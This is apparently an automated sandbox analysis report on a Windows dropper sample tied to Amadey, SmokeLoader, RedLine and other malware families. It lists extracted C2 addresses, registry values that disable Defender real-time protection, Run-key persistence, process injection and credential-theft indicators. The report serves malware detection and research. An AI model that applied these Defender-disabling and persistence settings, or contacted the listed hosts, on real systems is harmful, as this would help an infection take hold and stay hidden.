amadey | 2325f9ea396b0d4af172bb7fbae5b5517788dff313a9c1e7c2e06e86cb508c72

Analysis

max time kernel
151s
max time network
168s
platform
windows10-2004_x64
resource
win10v2004-20231020-en
resource tags

arch:x64arch:x86image:win10v2004-20231020-enlocale:en-usos:windows10-2004-x64system
submitted
02-11-2023 16:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

NEAS.f1f0745d4e72ec4b6fbd76c2610ad100.exe
Size

1.2MB
MD5

f1f0745d4e72ec4b6fbd76c2610ad100
SHA1

3c8c3d4da1a30db9a868177f1d9b24a293bb144e
SHA256

2325f9ea396b0d4af172bb7fbae5b5517788dff313a9c1e7c2e06e86cb508c72
SHA512

735fc1f63ccf4b4c035a9a4b0d09e19f2a72e9851c09cfd4f1e19ac3f4efc29432cf183ed156b9431b88df10201e10eed6bc2418dd09aeb3971dcce1f5e65660
SSDEEP

24576:3yTKIqCliT3lvn68fEzXlA8Susv/OC1wHR51kJvYpT:CTKILliryVA8ST/OC1YR56Jvs

Malware Config

Extracted

Family

smokeloader

Version

2022

http://77.91.68.29/fks/

rc4.i32

Extracted

Family

redline

Botnet

grome

77.91.124.86:19084

Extracted

Family

amadey

Version

3.89

http://77.91.124.1/theme/index.php

Attributes

install_dir
fefffe8cea
install_file
explothe.exe
strings_key
36a96139c1118a354edf72b1080d4b2f

rc4.plain

Extracted

Family

redline

Botnet

plost

77.91.124.86:19084

Extracted

Family

redline

Botnet

kedru

77.91.124.86:19084

Extracted

Family

redline

Botnet

@ytlogsbot

194.169.175.235:42691

Extracted

Family

smokeloader

Botnet

up3

Extracted

Family

redline

Botnet

pixelnew2.0

194.49.94.11:80

Extracted

Family

smokeloader

Version

2020

http://host-file-host6.com/

http://host-host-file8.com/

rc4.i32

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

DcRat 3 IoCs

DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

rat infostealer dcrat

Processes:

NEAS.f1f0745d4e72ec4b6fbd76c2610ad100.exeschtasks.exeschtasks.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	NEAS.f1f0745d4e72ec4b6fbd76c2610ad100.exe
4620	schtasks.exe
3288	schtasks.exe

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 4 IoCs

Processes:

resource	yara_rule
behavioral1/memory/5176-483-0x0000000000400000-0x0000000000D1B000-memory.dmp	family_glupteba
behavioral1/memory/5176-485-0x0000000002DB0000-0x000000000369B000-memory.dmp	family_glupteba
behavioral1/memory/5176-527-0x0000000000400000-0x0000000000D1B000-memory.dmp	family_glupteba
behavioral1/memory/5176-964-0x0000000000400000-0x0000000000D1B000-memory.dmp	family_glupteba

Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

Processes:

AppLaunch.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	AppLaunch.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	AppLaunch.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	AppLaunch.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	AppLaunch.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	AppLaunch.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	AppLaunch.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 12 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1068-49-0x0000000000400000-0x000000000043E000-memory.dmp	family_redline
C:\Users\Admin\AppData\Local\Temp\222C.exe	family_redline
C:\Users\Admin\AppData\Local\Temp\222C.exe	family_redline
behavioral1/memory/4636-125-0x0000000000E80000-0x0000000000EBC000-memory.dmp	family_redline
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Cl404Rl.exe	family_redline
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Cl404Rl.exe	family_redline
behavioral1/memory/4480-147-0x0000000000CF0000-0x0000000000D2C000-memory.dmp	family_redline
behavioral1/memory/5552-365-0x0000000000530000-0x000000000058A000-memory.dmp	family_redline
behavioral1/memory/3572-384-0x0000000000520000-0x000000000055E000-memory.dmp	family_redline
behavioral1/memory/5888-446-0x0000000000970000-0x000000000098E000-memory.dmp	family_redline
behavioral1/memory/3572-476-0x0000000000400000-0x0000000000461000-memory.dmp	family_redline
behavioral1/memory/5552-495-0x0000000000400000-0x0000000000480000-memory.dmp	family_redline

SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/5888-446-0x0000000000970000-0x000000000098E000-memory.dmp	family_sectoprat

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader

Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs

Processes:

latestX.exe

description	pid	process	target process
PID 6228 created 3476	6228	latestX.exe	Explorer.EXE
PID 6228 created 3476	6228	latestX.exe	Explorer.EXE
PID 6228 created 3476	6228	latestX.exe	Explorer.EXE
PID 6228 created 3476	6228	latestX.exe	Explorer.EXE
PID 6228 created 3476	6228	latestX.exe	Explorer.EXE

Blocklisted process makes network request 2 IoCs

Processes:

rundll32.exerundll32.exe

flow pid process

271 6372 rundll32.exe
281 4488 rundll32.exe
Downloads MZ/PE file
Drops file in Drivers directory 1 IoCs

Processes:

latestX.exe

description ioc process

File created C:\Windows\System32\drivers\etc\hosts latestX.exe
Modifies Windows Firewall 1 TTPs 1 IoCs
evasion

Windows Service
T1543.003

Processes:

netsh.exe

pid process

6784 netsh.exe
Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

flow	pid	process
271	6372	rundll32.exe
281	4488	rundll32.exe

description	ioc	process
File created	C:\Windows\System32\drivers\etc\hosts	latestX.exe

pid	process
6784	netsh.exe

Checks computer location settings 2 TTPs 7 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

explothe.exe4C98.exekos4.exerundll32.exeUtsysc.exe51AA.exe5fG7Mk0.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000\Control Panel\International\Geo\Nation	explothe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000\Control Panel\International\Geo\Nation	4C98.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000\Control Panel\International\Geo\Nation	kos4.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000\Control Panel\International\Geo\Nation	rundll32.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000\Control Panel\International\Geo\Nation	Utsysc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000\Control Panel\International\Geo\Nation	51AA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000\Control Panel\International\Geo\Nation	5fG7Mk0.exe

Executes dropped EXE 40 IoCs

Processes:

Ee8Pp60.exetk0JW85.exebK3NC71.exe1Yl21hz1.exe2Ro1236.exe3xE89Us.exe4PL534px.exe5fG7Mk0.exeexplothe.exeB17.exeexplothe.exe1D68.exeLb0Xn6uD.exeAB6LH6xe.exeaP7cd1aC.exe222C.exeQq4rX0EJ.exe1LH55nJ8.exe2Cl404Rl.exe4C98.exeInstallSetup5.exe51AA.exetoolspub2.exeBroom.exe31839b57a4f11171d6abc8bbc4451ee4.exe5A27.exekos4.exe660F.exelatestX.exetoolspub2.exe8178.exeLzmwAqmV.exeis-DF3MM.tmpUtsysc.exeIsoBuster_1123.exeIsoBuster_1123.exeexplothe.exerundll32.exe31839b57a4f11171d6abc8bbc4451ee4.exeexplothe.exe

pid	process
4684	Ee8Pp60.exe
2836	tk0JW85.exe
624	bK3NC71.exe
4888	1Yl21hz1.exe
5048	2Ro1236.exe
3280	3xE89Us.exe
404	4PL534px.exe
4508	5fG7Mk0.exe
3592	explothe.exe
628	B17.exe
4032	explothe.exe
4712	1D68.exe
1648	Lb0Xn6uD.exe
2836	AB6LH6xe.exe
2340	aP7cd1aC.exe
4636	222C.exe
784	Qq4rX0EJ.exe
2804	1LH55nJ8.exe
4480	2Cl404Rl.exe
5860	4C98.exe
3044	InstallSetup5.exe
5552	51AA.exe
5856	toolspub2.exe
2240	Broom.exe
5176	31839b57a4f11171d6abc8bbc4451ee4.exe
3572	5A27.exe
5952	kos4.exe
5888	660F.exe
6228	latestX.exe
6248	toolspub2.exe
6372	8178.exe
7016	LzmwAqmV.exe
5232	is-DF3MM.tmp
6688	Utsysc.exe
6596	IsoBuster_1123.exe
1100	IsoBuster_1123.exe
6436	explothe.exe
6016	rundll32.exe
2832	31839b57a4f11171d6abc8bbc4451ee4.exe
6368	explothe.exe

Loads dropped DLL 7 IoCs

Processes:

5A27.exerundll32.exeis-DF3MM.tmprundll32.exerundll32.exerundll32.exe

pid process

3572 5A27.exe
3572 5A27.exe
6572 rundll32.exe
5232 is-DF3MM.tmp
6016 rundll32.exe
6372 rundll32.exe
4488 rundll32.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

pid	process
3572	5A27.exe
3572	5A27.exe
6572	rundll32.exe
5232	is-DF3MM.tmp
6016	rundll32.exe
6372	rundll32.exe
4488	rundll32.exe

Adds Run key to start application 2 TTPs 9 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

NEAS.f1f0745d4e72ec4b6fbd76c2610ad100.exeEe8Pp60.exebK3NC71.exeLb0Xn6uD.exeQq4rX0EJ.exetk0JW85.exeB17.exeAB6LH6xe.exeaP7cd1aC.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	NEAS.f1f0745d4e72ec4b6fbd76c2610ad100.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	Ee8Pp60.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\""	bK3NC71.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	Lb0Xn6uD.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\""	Qq4rX0EJ.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	tk0JW85.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	B17.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\""	AB6LH6xe.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\""	aP7cd1aC.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops file in System32 directory 2 IoCs

Processes:

powershell.exe

description	ioc	process
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe

Suspicious use of SetThreadContext 5 IoCs

Processes:

1Yl21hz1.exe2Ro1236.exe4PL534px.exe1LH55nJ8.exetoolspub2.exe

description	pid	process	target process
PID 4888 set thread context of 5104	4888	1Yl21hz1.exe	AppLaunch.exe
PID 5048 set thread context of 3528	5048	2Ro1236.exe	AppLaunch.exe
PID 404 set thread context of 1068	404	4PL534px.exe	AppLaunch.exe
PID 2804 set thread context of 3904	2804	1LH55nJ8.exe	AppLaunch.exe
PID 5856 set thread context of 6248	5856	toolspub2.exe	toolspub2.exe

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery
T1082

Processes:

31839b57a4f11171d6abc8bbc4451ee4.exe

description ioc process

File opened (read-only) \??\VBoxMiniRdrDN 31839b57a4f11171d6abc8bbc4451ee4.exe

description	ioc	process
File opened (read-only)	\??\VBoxMiniRdrDN	31839b57a4f11171d6abc8bbc4451ee4.exe

Drops file in Program Files directory 35 IoCs

Processes:

is-DF3MM.tmplatestX.exe

description	ioc	process
File created	C:\Program Files (x86)\Smart Projects\IsoBuster\Lang\is-9RN7O.tmp	is-DF3MM.tmp
File created	C:\Program Files (x86)\Smart Projects\IsoBuster\Help\is-IL4VH.tmp	is-DF3MM.tmp
File created	C:\Program Files (x86)\Smart Projects\IsoBuster\Plugins\is-LND3E.tmp	is-DF3MM.tmp
File created	C:\Program Files (x86)\Smart Projects\IsoBuster\unins000.dat	is-DF3MM.tmp
File created	C:\Program Files (x86)\Smart Projects\IsoBuster\Lang\is-C5TK1.tmp	is-DF3MM.tmp
File created	C:\Program Files (x86)\Smart Projects\IsoBuster\Lang\is-TS4FS.tmp	is-DF3MM.tmp
File created	C:\Program Files (x86)\Smart Projects\IsoBuster\Lang\is-4H9OJ.tmp	is-DF3MM.tmp
File created	C:\Program Files (x86)\Smart Projects\IsoBuster\Lang\is-J0HTG.tmp	is-DF3MM.tmp
File created	C:\Program Files (x86)\Smart Projects\IsoBuster\Online\is-2GDRN.tmp	is-DF3MM.tmp
File created	C:\Program Files (x86)\Smart Projects\IsoBuster\Plugins\is-CG9LD.tmp	is-DF3MM.tmp
File created	C:\Program Files (x86)\Smart Projects\IsoBuster\Lang\is-7FKUD.tmp	is-DF3MM.tmp
File created	C:\Program Files (x86)\Smart Projects\IsoBuster\Lang\is-25Q8O.tmp	is-DF3MM.tmp
File created	C:\Program Files (x86)\Smart Projects\IsoBuster\Lang\is-J94I8.tmp	is-DF3MM.tmp
File created	C:\Program Files (x86)\Smart Projects\IsoBuster\Lang\is-AJCC4.tmp	is-DF3MM.tmp
File created	C:\Program Files (x86)\Smart Projects\IsoBuster\is-9MPOA.tmp	is-DF3MM.tmp
File created	C:\Program Files (x86)\Smart Projects\IsoBuster\Lang\is-NV1IE.tmp	is-DF3MM.tmp
File created	C:\Program Files (x86)\Smart Projects\IsoBuster\Lang\is-J5O73.tmp	is-DF3MM.tmp
File created	C:\Program Files (x86)\Smart Projects\IsoBuster\Lang\is-FV60O.tmp	is-DF3MM.tmp
File created	C:\Program Files\Google\Chrome\updater.exe	latestX.exe
File created	C:\Program Files (x86)\Smart Projects\IsoBuster\Lang\is-KETSP.tmp	is-DF3MM.tmp
File created	C:\Program Files (x86)\Smart Projects\IsoBuster\Lang\is-SVRQT.tmp	is-DF3MM.tmp
File created	C:\Program Files (x86)\Smart Projects\IsoBuster\Lang\is-5BHP0.tmp	is-DF3MM.tmp
File created	C:\Program Files (x86)\Smart Projects\IsoBuster\Lang\is-C922M.tmp	is-DF3MM.tmp
File created	C:\Program Files (x86)\Smart Projects\IsoBuster\Lang\is-TS0DK.tmp	is-DF3MM.tmp
File created	C:\Program Files (x86)\Smart Projects\IsoBuster\Online\is-IGOAQ.tmp	is-DF3MM.tmp
File created	C:\Program Files (x86)\Smart Projects\IsoBuster\Plugins\is-PA5LD.tmp	is-DF3MM.tmp
File created	C:\Program Files (x86)\Smart Projects\IsoBuster\Lang\is-THEHN.tmp	is-DF3MM.tmp
File created	C:\Program Files (x86)\Smart Projects\IsoBuster\Lang\is-NCPIJ.tmp	is-DF3MM.tmp
File created	C:\Program Files (x86)\Smart Projects\IsoBuster\Lang\is-R220K.tmp	is-DF3MM.tmp
File created	C:\Program Files (x86)\Smart Projects\IsoBuster\Plugins\is-C4OA1.tmp	is-DF3MM.tmp
File created	C:\Program Files (x86)\Smart Projects\IsoBuster\is-UR5JR.tmp	is-DF3MM.tmp
File opened for modification	C:\Program Files (x86)\Smart Projects\IsoBuster\unins000.dat	is-DF3MM.tmp
File opened for modification	C:\Program Files (x86)\Smart Projects\IsoBuster\IsoBuster_1123.exe	is-DF3MM.tmp
File created	C:\Program Files (x86)\Smart Projects\IsoBuster\Lang\is-0NKIA.tmp	is-DF3MM.tmp
File created	C:\Program Files (x86)\Smart Projects\IsoBuster\Lang\is-UBUUS.tmp	is-DF3MM.tmp

Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

1240 sc.exe
6680 sc.exe
676 sc.exe
6240 sc.exe
1768 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
1240	sc.exe
6680	sc.exe
676	sc.exe
6240	sc.exe
1768	sc.exe

Program crash 5 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
1564	3528	WerFault.exe	AppLaunch.exe
1332	3904	WerFault.exe	AppLaunch.exe
552	3572	WerFault.exe	5A27.exe
6172	3572	WerFault.exe	5A27.exe
4944	5176	WerFault.exe	31839b57a4f11171d6abc8bbc4451ee4.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

3xE89Us.exetoolspub2.exe

description	ioc	process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	3xE89Us.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	3xE89Us.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	3xE89Us.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exe

pid process

3288 schtasks.exe
4620 schtasks.exe

pid	process
3288	schtasks.exe
4620	schtasks.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exemsedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

31839b57a4f11171d6abc8bbc4451ee4.exepowershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2512 = "Lord Howe Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2322 = "Sakhalin Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1892 = "Russia TZ 3 Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2182 = "Astrakhan Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2162 = "Altai Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-282 = "Central Europe Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2041 = "Eastern Daylight Time (Mexico)"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2632 = "Norfolk Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1891 = "Russia TZ 3 Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
